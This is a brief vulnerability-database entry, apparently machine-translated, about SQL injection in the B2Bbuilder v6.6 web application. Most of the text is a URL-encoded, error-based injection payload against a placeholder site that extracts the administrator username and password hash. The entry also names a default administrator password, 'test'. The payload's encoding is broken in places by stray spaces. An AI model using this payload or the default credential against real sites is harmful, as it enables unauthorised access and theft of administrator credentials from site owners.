B2Bbuilder injection vulnerability+Exp+the default administrator account-vulnerability warning-the black bar safety net

2013-07-22T00:00:00
ID MYHACK58:62201339792
Type myhack58
Reporter Adoing
Modified 2013-07-22T00:00:00

Description

The test version of the program is: B2Bbuilder_v6. 6

http://www.site.com/?m=offer&s=offer_list&id=1 0 0 4+and%28select+1+from%28select+count%2 8*%2 9%2Cconcat%2 8% 2 8

select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin. user,0x27,password

%2C0x27%2C0x7e%2 9+from+%60b2bbuilder%6 0. b2bbuilder_admin+Order+by+user+limit+0%2C1

%2 9+%2 9+from+%60information_schema%6 0. tables+limit+0%2C1%2 9%2Cfloor%28rand%2 8 0% 2 9

*2%2 9%29x+from+%60information_schema%6 0. tables+group+by+x%29a%2 9+and+1%3D1

This B2B program there is a default administrator account, the account password is test